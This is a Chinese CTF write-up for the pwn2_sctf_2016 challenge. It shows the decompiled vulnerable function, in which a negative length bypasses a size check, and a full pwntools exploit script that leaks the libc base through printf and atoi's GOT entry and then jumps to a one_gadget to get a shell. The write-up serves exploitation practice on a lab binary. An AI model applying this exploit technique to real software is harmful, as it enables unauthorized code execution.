pwn2_sctf_2016

题目链接：pwn2_sctf_2016。

下载附件后，使用 IDA 反编译，定位到主要函数，如下。

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setvbuf(stdout, 0, 2, 0);
  return vuln();
}

vuln 函数如下。

int vuln()
{
  char nptr[32]; // [esp+1Ch] [ebp-2Ch] BYREF
  int v2; // [esp+3Ch] [ebp-Ch]

  printf("How many bytes do you want me to read? ");
  get_n(nptr, 4);
  v2 = atoi(nptr);
  if ( v2 > 32 )
    return printf("No! That size (%d) is too large!\n", v2);
  printf("Ok, sounds good. Give me %u bytes of data!\n", v2);
  get_n(nptr, v2);
  return printf("You said: %s\n", nptr);
}

解题思路：

1. 栈溢出，泄露 LIBC 基址。
2. 栈溢出，打 One_GadGet。

解题脚本如下。

from pwn import *
from pwn import p32, p64, u32, u64
from settings import *
from modules import *

def pwn():
    # .text:080483D0 ; void __usercall __noreturn start(int@<eax>, void (*)(void)@<edx>)

    sla('How many bytes do you want me to read? ', '-1')

    payload = (0xFFFFD00C - 0xFFFFCFDC) * b'a' + p32(ELF_FILE.plt['printf']) + p32(0x080483D0) + p32(ELF_FILE.got['atoi'])

    sla("bytes of data!\n", payload)

    LIBC_ADDR = uu32(ru('\xF7')[-4:]) - LIBC_FILE.symbols['atoi']

    leak('LIBC_ADDR', LIBC_ADDR)

    one = one_gadget(LIBC_ADDR)

    sla('How many bytes do you want me to read? ', '-1')
    
    payload = (0xFFFFD00C - 0xFFFFCFDC) * b'a' + p32(one[2])

    sla("bytes of data!\n", payload)

    irt()

pwn()